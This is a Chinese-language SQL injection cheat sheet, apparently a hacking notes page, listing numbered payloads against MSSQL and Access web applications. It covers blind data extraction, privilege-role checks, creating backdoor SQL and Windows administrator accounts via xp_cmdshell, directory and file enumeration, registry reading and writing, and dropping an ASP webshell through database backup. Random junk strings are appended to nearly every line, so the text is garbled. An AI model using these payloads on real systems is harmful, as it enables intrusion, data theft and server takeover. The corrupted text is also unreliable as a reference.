1.判断是否有注入;and 1=1 ;and 1=2 tC^ 1}
2.初步判断是否是mssql ;and user>0 *~cqr
BY3bpR
3.注入参数是字符'and [查询条件] and ''=' {1jpLdCbV^
vwVVBG;t
4.搜索时没过滤参数的'and [查询条件] and '%25'=' yB.G=90
IrJ+Jov
5.判断数据库系统 gdl| ^*tc
>L8?=>>?\
;and (select count(*) from sysobjects)>0 mssql os[ZIHph
L~IE,4
;and (select count(*) from msysobjects)>0 access H#+\nT2m
jk )Vb
q %>7L<r
ZI,j?i6\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 uG;?vvg>
4:D:| r
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 b6|Z"{TI
_
&M[MEO`t8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 )Nbc/nB$
_m Xs4
9.(1)猜字段的ascii值(access) %4,xx'`
lK*jhW?3:
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 fmFzW*,E
S.: 7k9
(2)猜字段的ascii值(mssql) 6JSY56v
P'sfi>A
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 s
D_G)c
b4CF`BG
10.测试权限结构(mssql) RAV^D.
'@bJlJB9>
H8&p<=
5X0QxnnV
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- %%&e"&7HE
}S */b1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4@6<
gXt O*Rfqk
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- qz`rL#W]
+i. u< T
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- )7dEi+v52
^LVk5l)\>g
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- =2%VZE7Vm
G6V/S aD
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- d`Oe_<
0 _A23.Y
;and 1=(select IS_MEMBER('db_owner'));-- L+.H z&*@
4z_n4=
oxfF`L"
|n`PESf_
11.添加mssql和系统的帐户 d; =u
& fu z2xv
;exec master.dbo.sp_addlogin username;-- +AoP{x$Ia
;exec master.dbo.sp_password null,username,password;-- ,[X_]e;
V&*D~Jq
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- HTk\723Rdw
ARF\fF|<2
;exec master.dbo.xp_cmdshell 'net user username password 'Jydu
jXp. qK\"
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- d>|;f
%
5z
gd>
;exec master.dbo.xp_cmdshell 'net user username password /add';-- CZ(`|;BC*
GoIQ>n
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ~}Z'0W)Q`z
Yw)Fbt^
-bS)=L
&RO7{,`
12.(1)遍历目录 fu R2S70d
I]R9HGJNlJ
;create table dirs(paths varchar(100), id int) 6G of.:"f
=45W\
;insert dirs exec master.dbo.xp_dirtree 'c:\' "3}<8c
aSL6zye
,
;and (select top 1 paths from dirs)>0 $UvPo0{
`/4:I
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) uel{`T[S
J,5+47b1}R
x[X`a
vHcqEV|P/n
(2)遍历目录 `PlOwj@u0`
{^m Kvc
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- S6sq#kcH
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @AQwr#R"l
`}fw1X5L
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |cd-!iJX-
F!yV8XQ
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 A@$kLex
Y#HI;Y^RP
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6B6vP%H#
|PP.<ce\-
N3%*7{X
9
q0./O|Dj
13.mssql中的存储过程 ss
iok LE
V.=lGhi
xp_regenumvalues 注册表根键, 子键 b>11h
fS=hpL6]@
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 O{]9hm(tN
JOD/Raq.1k
xp_regread 根键,子键,键值名 Ig \#f
E[g*O5
;exec xp_regread QlEd6^&
38IMxd9v
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 &<]<a_pw
:iPym}CE
xp_regwrite 根键,子键, 值名, 值类型, 值 )9L/sKz
2k5/SV
X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 $yu?.b
9H#
ub K7B |p
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 rv7{Ow_Y
z|N3G E(.@
xp_regdeletevalue 根键,子键,值名 rHz||jjU
M 2q"dz
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %,UPJn
1m@^E:w
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 9 OT,TpA
N#ioJ^}n:
eQDX:b
3EK9,:<Cf
14.mssql的backup创建webshell u2iXJmM*
s'\$t
use model W?Ww2Lo%Y
>:1P/U
create table cmd(str image); RU#F8O
1/Zh^foG
insert into cmd(str) values (''); ,wAz^cK|
$}o
b,i^W
backup database model to disk='c:\l.asp'; 'LS z f/w
Jxl6a:
7cTk@Gq
q3P+9/6
15.mssql内置函数
V
9;[M;
'T8W!&$
;and (select @@version)>0 获得Windows的版本号 Mps5Vv
=^;P#kX
;and user_name()='dbo' 判断当前系统的连接用户是不是sa `[fxyg:u
.uz|/Zy
;and (select user_name())>0 爆当前系统的连接用户 vbG]mMJ
|j~lkzPnV
;and (select db_name())>0 得到当前连接的数据库 ~bK9R0|<
p&b5% 4P
PnYBy| yl
H17-/|-;0!
16.简洁的webshell .qv'6G
+&=?BC}L9^
use model
jN*:QI
4JyM7ePND}
create table cmd(str image); %;"@Ah
9jir*UI
insert into cmd(str) values (''); Af(WV>'
5*-3?
<)e
backup database model to disk='g:\wwwtest\l.asp';